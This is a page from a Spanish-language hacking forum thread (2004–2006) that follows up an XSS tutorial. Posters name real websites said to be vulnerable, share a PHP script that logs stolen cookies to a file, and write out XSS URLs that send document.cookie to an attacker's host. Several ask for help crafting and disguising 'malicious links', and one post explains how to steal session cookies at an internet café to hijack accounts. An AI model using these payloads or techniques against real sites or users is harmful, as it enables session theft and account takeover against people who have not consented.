elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
12 Febrero 2012, 21:42  


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación
| | |-+  [::Tutorial::] - Ataques XSS
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: [::Tutorial::] - Ataques XSS  (Leído 94,337 veces)
joserra89


Desconectado Desconectado

Mensajes: 987


"./"


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #15 en: 15 Septiembre 2004, 08:03 »

Una cosa, todavia no e encontrado una web vulnerable, e buscado en todos mis favoritos y todos los buscadores no me dan la alerta, alguien sabe algun site que tenga el fallo ??? ??? ???


En línea

"Sin metodo, sin orden, sin voluntad, no es posible el triunfo"


9reynas

Desconectado Desconectado

Mensajes: 55



Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #16 en: 10 Noviembre 2004, 11:03 »

debido  a lo antiguo de este no se si  daran respuesta  bueno encontre una direccion que es vulnerable
http://campusvirtual.uma.es/ihj/_contenidos/buscador.php
bueno le das a <script>alert()</script> y te salta la alerta ,, asiq uebueno
 umm cheque las fuentes y ....
<form action="" method="post">
<input type="text" name="search_term" size="40" maxlength="40" value="">
<input type="submit" value="Buscar">
</form>
como se daran cuenta este form no tiene ni nombre y el boton de envio tampoco tiene nombre mi pregunta es como quedaria la web a la  que le tendrian que linkear los demas
 que hago remmplazo los espacios de los nombres con espacios vacios osea nada ??????????..............
 asi ademas esta web  no tiene sistema de usuarios pero me queda la duda de como seria la direccionm aligna como dice neo hex

thank por las respuestas 9reynas


En línea
9reynas

Desconectado Desconectado

Mensajes: 55



Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #17 en: 10 Noviembre 2004, 11:37 »

respondiendole al tioq ue posteoun poco mas arriba basta con poner buscador.php en google  ::)
bueno checando mejor esto se me ocurre algoo mas el script de cokies.phpcomo se ve en su variable $cokie hace la peticion de la cokie



cookies.php

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

ahora viene so esta claro  lo del archivo.txt que se deposita la cokie alli tambiene sta caro
 pero en esta url
Código:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;


hasta donde me dan mis pobrees conocimientos de cgi cuando se pasa una consulata a un formulario los datos introducidos se pasan como despues del scrip cgi  en este formato          lawe.com/script.cgi?nombre=valor&nombre1=valor1 etc etc dependiendo d elos campos del form

aqui mi duda entonces l primer cgi seria buscador.php

 ahora la primera pareja seria
palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

y la segunda pareja seria
buscar=;





ahora analizando la primera pareja checamos esta parte
 'http://www.atacante.com/cookies.php?cookie='+document.cookie


ahora  en esto el  cgi seria cookies.php
 y su pareja seria cookie='+document.cookie



ahora sia lguien postea las  fuentes de buscador.php seria buenisimo igual  la voya  buscar supongo que eso nos aclararia bastante loq ue hace esa url

 buenoo voya buscar ciao 
9reynas
  de ante mano si me equivoco en algo corriganme y  nada salu2




En línea
Adept

Desconectado Desconectado

Mensajes: 25



Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #18 en: 12 Noviembre 2004, 02:18 »

Si la página esn vez de estar hecha en php está hecha en cfml, ¿cómo quedaría el código del archivo?
En línea

Those were the words of Adept...
Falso Positivo

Desconectado Desconectado

Mensajes: 235



Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #19 en: 15 Agosto 2005, 23:02 »


Aca el nombre del formulario seria 'formul'
Pero el nombre del boton?????
cual es???
Código:
<tr>
<form name="formul" method="get" action="../home/search.php">
<td><img src="images/spacer.gif" width="5"></td>
<td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td>
<td><img src="images/spacer.gif" width="3"></td>
<td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td>
</form>


Salu2.
En línea

Don't worry, be hacked....
joanikus

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #20 en: 18 Agosto 2005, 18:06 »

okey gracias por el tuto pero yo lo poongo en un buscadoir e nuke et y me da error eso se considera aletra¿
En línea
Rentero
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.163


La paciencia es la madre de la ciencia.


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #21 en: 18 Agosto 2005, 18:37 »

Ni me acordaba de este tutorial xD


Aca el nombre del formulario seria 'formul'
Pero el nombre del boton?????
cual es???
Código:
<tr>
<form name="formul" method="get" action="../home/search.php">
<td><img src="images/spacer.gif" width="5"></td>
<td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td>
<td><img src="images/spacer.gif" width="3"></td>
<td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td>
</form>


Salu2.


En este caso no hay ningún botón. Hay un enlace que llama a una función de javascript llamada submit().
Mira el código fuente de esa función a ver si puedes sacar algo :)

P.D: Recuerdo que esto es solo un pequeño texto de introducción :)
Y que ya cada vez hay menos webs con este error. Parece que estamos aprendiendo a programar xDD
En línea

Firmado.
joanikus

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #22 en: 20 Agosto 2005, 13:02 »

eyy muxas gracias por el tuto pero una cosilla esa url maligna se puede camuflar con un .tk o .cjb.net??? gracias
En línea
Rentero
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.163


La paciencia es la madre de la ciencia.


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #23 en: 20 Agosto 2005, 14:31 »

Pues upongo que si. Pero si no recuerdo mal ahora en TK te teine 15 segundo(o hasta que pulses un enlace) en una pagina promocinal. No creo que eso sea uy creible...bueno, es cuestión de probar.
En línea

Firmado.
-sagitari-


Desconectado Desconectado

Mensajes: 1.641


:D


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #24 en: 1 Septiembre 2005, 16:49 »

una web vulnerable a este tipo de atake es:

www.programas-gratis.net

si no m ekivoco, pero yo como soy una buena niña, m comporto y no ataco lo primero q es vulnerable...
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #25 en: 6 Agosto 2006, 09:38 »

@Torocatala:
prohibido dar informacion de terceros.
En línea

satan69


Desconectado Desconectado

Mensajes: 341



Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #26 en: 7 Agosto 2006, 07:07 »

mi pregunta es si no hay en el red una pagina para pasar de accsi a hexadecimales.. asi es mas rapido porque encontre una web vulnerable.. jijijiji ;D ;D ;D
En línea

Crack_X
Anti-War
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.320


Peace & Love


Ver Perfil WWW
Re: [::Tutorial::] - Ataques XSS
« Respuesta #27 en: 7 Agosto 2006, 07:11 »

http://www.elhacker.net/sneak.php
En línea

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone
satan69


Desconectado Desconectado

Mensajes: 341



Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #28 en: 7 Agosto 2006, 07:16 »


gracias.. ;D ;D


ademas de eso quiero que me ayuden hacer un link maligno..


Código:
                  <td align="center"><p>Buscar Blogs</p></td>
                </tr>
                <tr>
                  <td align="center"><input id="keyword" name="keyword" size="10" type="text" /></td>
                </tr>
                <tr>
                  <td align="center"><input name="submit" type="submit" value="Buscar" /><

http://www.victima.com/?Keyword=<script>window.location='http://server/cookies.php?cookie='+document.cookie;</script>&buscar=;


la victima no tiene buscador.php sino que en la pagina principal esta el buscador... si es ese el enlace digame sino pues me puede corregir
« Última modificación: 7 Agosto 2006, 07:58 por satan69 » En línea

frankener1986

Desconectado Desconectado

Mensajes: 124


Reversing the world


Ver Perfil
Re: [::Tutorial::] - Ataques XSS
« Respuesta #29 en: 4 Septiembre 2006, 22:49 »

Otra manera es irse a un ciber, y mirar a alguno que este en una pagina la cual te gustaria tener su cuenta... con un poco de suerte, si cierra la ventana del explorador sin hacer logout, vas al explorador en el que estaba, le das a ver las cookies, buscas el nombre de la pagina, y te las apuntas las dos (o puede que alguna mas, suelen ser user y password), y luego, en tu casa, creas las cookies que copiaste en aquel papel... y listo.. y si la pagina no pide confirmacion de contraseña actual para cambiarle el password, hasta podras hacerlo xD     
En línea

Programad en C porfavor, que veo VB y parece un extracto de una novela mas que un codigo! jiji
Páginas: 1 [2] 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines